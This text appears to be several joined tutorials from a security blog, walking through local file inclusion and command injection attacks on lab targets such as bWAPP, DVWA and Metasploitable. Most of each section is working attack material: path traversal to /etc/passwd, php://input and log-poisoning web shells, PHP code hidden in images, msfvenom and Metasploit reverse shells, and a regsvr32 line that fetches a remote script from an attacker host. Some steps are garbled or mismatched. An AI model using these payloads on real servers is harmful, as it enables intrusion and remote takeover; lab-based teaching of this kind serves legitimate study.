5 ways to Exploit LFi Vulnerability

The main aim of writing this article is to share the idea of making an attack on a web server using various techniques when the server is suffering from file inclusion vulnerability. As we all are aware of LFI vulnerability which allows the user to include a file through URL in the browser. In this article I have used two different platform bWAPP and DVWA which contains file inclusion vulnerability and through which I have performed LFI attack in FOUR different ways.

Basic local file inclusion

Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL. To perform basic attacks manipulate

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd

 In basic LFI attack we can directly read the content of a file from its directories using (../) or simply (/), now if you will notice the given below screenshot you will find that I have access the password file when the above URL is executed in the browser.

Null byte

 In some scenario the above basic local file inclusion attack may not work due to high security level. From below image you can observe now that I got fail to read the password file when executing the same path in URL. So when we face such kind of problem then go for NULL BYTE attack.

Now turn on burp suite to capture the browser request then select proxy tab and start intercept. Do not forget to set browser proxy while making use of burp suite

Now inside burp suite send the intercepted data into repeater.

Inside repeater you can do analysis of sent request and response generated by it. From screenshot it will be clear that /etc/passwd is not working and I am not able to read the password file.  

From following screenshot you can see I had forward the request by adding null character (%00) at the end of directory /etc/passwd%00 and click on go tab. Then on the right sight of window the password file get open as response.

Base64 encoded

 Now there is another way to exploit LFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.

http://192.168.1.101/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource=/etc/passwd

Here from the screenshot you can see the content of password file is encoded into base64; copy the whole encoded text.

I am using hackbar which a Firefox plugin to decode above copied text.

Now a pop-up box will get open past the copied encoded text inside it and click on ok

From the given screenshot you can view the result and read the content of password file.

PHP Input

 Using PHP input function we will execute injected PHP code to exploit LFI vulnerability. With the help of hackbar I am going to perform this task in which first we need to load the URL of the targeted web page as you can see in the given screenshot.

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go

Now manipulate above URL using PHP input function

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

 Then select the check box to enable Post data which will forward the post request and add cmd comment in given text area<?php system($_GET[‘cmd’]); ?>as shown in following screenshot, finally click on execute.

This will show directories of victim PC.

Now time to connect the victim through reverse connection; open terminal in kali Linux and type msfconsole to start metasploit framework.

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.0.104 

msf exploit (web_delivery)>set srvport  8081

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste above copied PHP code inside the URL as shown in the image and execute it.

When above URL get execute the attacker got victim’s meterpreter session inside the metasploit.

msf exploit (web_delivery)>session –I 1

meterpreter> sysinfo

Proc/self/environ

If the server is outdated then to exploit it through LFI we can include proc/self/environ file that stores User_Agent where we will place our PHP code for executing CMD command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ

Now start burp suite and capture the browser request and send the fetch data into repeater.

Add cmd comment <?php system($_GET[‘cmd’]); ?> inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id as shown in the below image. On the right side of window you can see the highlight result as response.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Exploit Webserver through Log Injection with LFI

Through this article you will see how to create local file inclusion log posioning inside the target machine and gain unauthourized access with help of apache access .log file.

Attacker: Kali Linux

Target: Metasploitable 2

 Connect the target using SSH  service as shown below in the following image

ssh msfadmin@192.168.1.8

 Now login with user as “sudo” and create a folder “lfi” inside /var/www

cd /var/www

mkdir lfi

Now create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.

<?php

   $file = $_GET[‘file’];

   if(isset($file))

   {

       include(“$file”);

   }

   else

   {

       include(“index.php”);

   }

   ?>

Now I have saved above PHP code inside a text file as lfi.php andshare this file.

In order to download lfi.PHP inside the lfi directory type following command

Wget http://192.168.1.25/lfi.php

Now let’s browse following URL: 192.168.1.8/lfi/lfi.php

In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

Now I will try to open apache access.log file and to explore this file first I will give read permission to apache2 and then include the acess.log file.

Now include the acess.log file as file parameter and give following URL inside browser.

192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log

Now turn on burp suite to capture the request of same web page

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.

Add cmd comment <?php system($_GET[‘cmd’]); ?> inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&c=ps as shown in the below image. Then click on forward.

Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same manner execute lsb_release –a through cmd and view the result from inside the given screenshot.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Web Server Exploitation with LFI and File Upload

In this article you will learn how to bypass file uploading vulnerability in high security through FILE INCLUSION vulnerability. As well as how to bypass local file inclusion to get reverse connection of victim’s Pc.

Attacker: kali Linux

Target: DVWA

 First you need to download Exif Piot tool from here. This is a GUI tool for windows users which allow adding exif data and Meta data inside a JPEG, PNG and GIF images.

Now open exif pilot and insert any image to hide malicious comment inside it; from screenshot you can see I have choose shell.png image and then click on EDIT EXIF/IPTC.

Further inside comment text field type <?php system($_GET[‘c’]); ? as malicious code and click on ok.

Here the exif data has been edited successfully inside the image. This tool replaces the malicious image from the original image in the same folder and sent the original image into recycle bin.

Now explore target IP in browser and login into DVWA with admin: password as credential. Set security level high.

Choose vulnerability file upload to upload the malicious image in the web server application and now browse your malicious image shell.png then click on upload.

It will show the path of uploaded image copy the highlighted path.

Now open the copied path in browser where you will find the uploaded image.

In order to execute the malicious code we need to change the category of vulnerability as well as security level also so that we can execute the hidden comment inside the image.

Now set security level low.

In order to bypass file uploading vulnerability in high security of DVWA we need to set other vulnerability and I have select File Inclusion for this purpose.

File Inclusion allow users to execute any file through URL as I have described above.

Now past the above copied path of uploaded image inside the URL as shown in screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png

 Here it has given warning system (): cannot execute blank command which means we need to add some command for execution hence through URL we will be able to execute any command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=ifconfig

Here I try to check network configuration of victim’s Pc and you can see the result of network configuration from screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=dir

Here you can view the directories which I have got by executing dir command in URL.

Now next I will try to achieve meterpreter session using Kali Linux

Type msfconsole and load metasploit framework.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103

msf exploit(regsvr32_applocker_bypass_server) > set lport 1234

msf exploit(regsvr32_applocker_bypass_server) > exploit

regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Copy the above malicious code and send it to victim.

Here paste above .dll malicious code inside the URL and when you will run the code in the browser; attack will get victim’s meterpreter session on his kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Meterpreter session 1 will get open

Meterpreter>sysinfo

Second Way

 In second part we will try to combine a malicious PHP file with an image, further use that malicious image for uploading in web application server and then bypass that image in same manner as performed above.

Here first you need to download any .png/.jpg/.gif image and save it on Desktop. Inside Kali Linux I have downloaded an image and save it with the name “a.png” on the desktop. Now open the terminal and type following command to generate a PHP code inside “a.png” image.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png

Let’s verify whether the image contains the malicious code inside it or not

Cat /root/Desktop/a.png

When you will scroll down the window screen, here you will find that the end part of image contains PHP code. It means we have successfully created the malicious image which ready to upload inside the web application server.

Now repeat the above process to upload the file inside DVWA with security level high. From given screenshot you can see my “a.png” image is successfully uploaded inside the web server.

Copy the highlighted path where image is uploaded.

Before executing image in web server start multi/handler in background inside the kali Linux

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) >exploit

Again set security level low in DVWA and turn on the File Inclusion vulnerability and repeat the same process as above, now the paste the above copied path of uploaded image inside the URL and execute it which will provides reverse connection on kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/a.png

meterpreter > sysinfo

I have got meterpreter session of victim PC

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Command Injection to Meterpreter using Commix

In this article I will show how easily you can hack a web server using commix tool if the severe is suffering from OS command injection vulnerbility and try to access meterpreter shell.

Attaker: kali Linux

Target: bwapp

Download it from here and install and run it with VM ware.

Being an attacker browser target IP in browse:192.168.0.105/bwapp, now Login with bee:bug as credential and select OS command injection from choose your bug; then click on hack.

Here requested web page gets open where you can execute any command. Now I will start burp suite to capture the request. In order to start intercept click the proxy tab and turn on intercept; don’t forget to run proxy inside the browser. Now give any command like IP: 192.168.0.105 and click on lookup.

Inside burp suite you will get the post request has been captured. Here we have victim’s details which will be helpful for making an attack on its web server. Now select the whole data from POST……. &form=submit then copied it and saved in a text file. I had saved it as os.txt and further use it with commix.

In previous tutorial we had used manual step inside commix to execute the given command for making attack but here the step is more easy and convenience to apply for making an attack. Now Type following command for commix to start attack.

Commix –r /root/Desktop/os.txt

Hit enter or press Y as reply of every question. From given screenshot you can see I have got the victim’s shell and here I had executed following command to retrieve victim’s detail.

Whoami

Id

Now start reverse tcp connection using below steps.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.0.104

commix(reverse_tcp) > set LPORT 8888

 Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set target Type ‘5’ to use php meterpreter reverse tcp shell.

 commix(reverse_tcp) >5

Copy the highlighted text and paste it on anther terminal which will load metasploit framework and start multi handler automatically at background.

Once the metasploit get loaded then move back to previous terminal where commix is running hit enter here.

From given screenshot you can see I have got meterpreter shell.

Meterpreter>sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...